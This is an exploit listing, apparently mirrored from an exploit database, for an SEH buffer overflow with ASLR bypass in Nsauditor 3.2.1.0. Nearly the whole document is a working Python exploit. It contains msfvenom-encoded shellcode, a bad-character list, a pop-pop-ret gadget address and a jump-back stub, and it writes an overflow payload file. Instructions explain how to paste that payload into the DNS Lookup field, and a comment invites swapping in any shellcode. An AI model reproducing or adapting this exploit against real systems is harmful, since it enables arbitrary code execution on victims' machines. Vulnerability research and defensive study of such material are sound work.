Exploit for Nsauditor 3.2.1.0 Buffer Overflow

Name: Exploit for Nsauditor 3.2.1.0 Buffer Overflow
Rating: 5 (89 reviews)
2020-04-20 | CVSS 0.9
## https://sploitus.com/exploit?id=PACKETSTORM:157286
# Exploit Title: Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))  
# Date: 2020-04-17  
# Exploit Author: Cervoise  
# Vendor Homepage: https://www.nsauditor.com/  
# Software Link: https://www.nsauditor.com/downloads/nsauditor_setup.exe  
# Version: 3.2.1.0 and 3.0.28  
# Tested on: Windows 10.0.18363.778 x86 Pro EN  
  
# Exploit originally found on Nsauditor 3.0.28.0 by ACHILLES   
(https://www.exploit-db.com/exploits/46005)  
# Latest version Nsauditor 3.2.1.0 (4/13/2020 1:51:53) is still   
vulnerable  
  
# 1 -> Change the shellcode with the one you want  
# 2 -> Open nsauditor-3-2-1-exploit.txt and copy content to clipboard  
# 3 -> Open Nsauditor  
# 4 -> In the Window select "Tools" -> "Dns Lookup"  
# 5 -> Paste the content into the Field: "Dns Query'"  
# 6 -> Click "Resolve"  
  
#!/usr/bin/python3  
  
# Badchars ->   
\x00\x0a\x0d\x2e\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9f\xf0\xf1\xf2\xf3\xf4\xf5\xf6  
# Maybe less badchars between \x80 and \x9f but I was lazy (I just   
checked thoose I needed)  
  
# msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed -f python -v   
shellcode  
shellcode = b""  
shellcode += b"\x89\xe7\xd9\xe9\xd9\x77\xf4\x59\x49\x49\x49"  
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43"  
shellcode += b"\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30"  
shellcode += b"\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"  
shellcode += b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"  
shellcode += b"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x6e\x62\x73"  
shellcode += b"\x30\x37\x70\x75\x50\x35\x30\x6f\x79\x68\x65"  
shellcode += b"\x36\x51\x6f\x30\x43\x54\x4e\x6b\x70\x50\x30"  
shellcode += b"\x30\x4e\x6b\x43\x62\x56\x6c\x4c\x4b\x73\x62"  
shellcode += b"\x54\x54\x6c\x4b\x61\x62\x65\x78\x36\x6f\x58"  
shellcode += b"\x37\x71\x5a\x56\x46\x66\x51\x49\x6f\x6e\x4c"  
shellcode += b"\x65\x6c\x51\x71\x53\x4c\x43\x32\x46\x4c\x47"  
shellcode += b"\x50\x6f\x31\x4a\x6f\x66\x6d\x46\x61\x79\x57"  
shellcode += b"\x69\x72\x69\x62\x46\x32\x36\x37\x4c\x4b\x63"  
shellcode += b"\x62\x76\x70\x4c\x4b\x63\x7a\x45\x6c\x6e\x6b"  
shellcode += b"\x72\x6c\x47\x61\x62\x58\x79\x73\x77\x38\x55"  
shellcode += b"\x51\x7a\x71\x72\x71\x6e\x6b\x62\x79\x57\x50"  
shellcode += b"\x37\x71\x78\x53\x4e\x6b\x57\x39\x72\x38\x5a"  
shellcode += b"\x43\x54\x7a\x61\x59\x4e\x6b\x57\x44\x4c\x4b"  
shellcode += b"\x45\x51\x39\x46\x30\x31\x79\x6f\x6e\x4c\x5a"  
shellcode += b"\x61\x4a\x6f\x44\x4d\x63\x31\x79\x57\x76\x58"  
shellcode += b"\x49\x70\x51\x65\x69\x66\x76\x63\x43\x4d\x58"  
shellcode += b"\x78\x45\x6b\x51\x6d\x57\x54\x64\x35\x48\x64"  
shellcode += b"\x46\x38\x6c\x4b\x42\x78\x67\x54\x36\x61\x6a"  
shellcode += b"\x73\x31\x76\x6c\x4b\x44\x4c\x52\x6b\x6c\x4b"  
shellcode += b"\x66\x38\x65\x4c\x57\x71\x4a\x73\x6e\x6b\x36"  
shellcode += b"\x64\x4e\x6b\x47\x71\x38\x50\x6d\x59\x42\x64"  
shellcode += b"\x35\x74\x51\x34\x31\x4b\x33\x6b\x70\x61\x42"  
shellcode += b"\x79\x43\x6a\x50\x51\x6b\x4f\x4d\x30\x33\x6f"  
shellcode += b"\x63\x6f\x43\x6a\x4e\x6b\x77\x62\x7a\x4b\x6e"  
shellcode += b"\x6d\x53\x6d\x50\x6a\x67\x71\x4e\x6d\x6c\x45"  
shellcode += b"\x4e\x52\x73\x30\x37\x70\x75\x50\x72\x70\x35"  
shellcode += b"\x38\x46\x51\x4e\x6b\x52\x4f\x4f\x77\x4b\x4f"  
shellcode += b"\x38\x55\x6f\x4b\x4c\x30\x6e\x55\x6c\x62\x71"  
shellcode += b"\x46\x53\x58\x4f\x56\x6d\x45\x6d\x6d\x6d\x4d"  
shellcode += b"\x39\x6f\x58\x55\x47\x4c\x44\x46\x43\x4c\x74"  
shellcode += b"\x4a\x6b\x30\x49\x6b\x59\x70\x34\x35\x47\x75"  
shellcode += b"\x6f\x4b\x50\x47\x56\x73\x73\x42\x70\x6f\x53"  
shellcode += b"\x5a\x67\x70\x51\x43\x4b\x4f\x6b\x65\x31\x73"  
shellcode += b"\x70\x61\x52\x4c\x30\x63\x73\x30\x41\x41"  
  
  
# 0x006ea017 : pop esi # pop ecx # ret | startnull   
{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False,   
SafeSEH: False, OS: False, v3.0.28.0 (C:\Program   
Files\Nsauditor\Nsauditor.exe)  
# 0x006ea017 : pop esi # pop ecx # ret | startnull   
{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False,   
SafeSEH: False, OS: False, v3.2.1.0 (C:\Program   
Files\Nsauditor\Nsauditor.exe)  
  
pop_pop_ret = b"\x17\xa0\x6e"  
jmp_back = b"\xeb\xc3\x90\x90" #JMP 0xffffffc5  
  
# An address near the end of our buffer is on the stack, only three pop   
are needed to get it  
# Then we just have to moving at the begging of our buffer  
# An egghunter does the job, but will not be compatible with all Windows   
versions  
going_back = b"\x58" #POP EAX  
going_back += b"\x58" #POP EAX  
going_back += b"\x58" #POP EAX  
going_back += b"\x83\xE8\x79" #SUB EAX,0x79  
going_back += b"\x83\xE8\x79" #SUB EAX,0x79  
going_back += b"\x83\xE8\x79" #SUB EAX,0x79  
going_back += b"\x83\xE8\x79" #SUB EAX,0x79  
going_back += b"\x83\xE8\x79" #SUB EAX,0x79  
going_back += b"\xFF\xE0" #JMP EAX  
  
buffer = b"\x90"*(5235-len(shellcode)-len(going_back)-100)  
buffer += shellcode + b"\x90"*100  
buffer += going_back  
buffer += jmp_back + pop_pop_ret #nSEH / SEH  
  
# Write the exploit  
file = open("nsauditor-3-2-1-exploit.txt", "wb")  
file.write(buffer)  
file.close()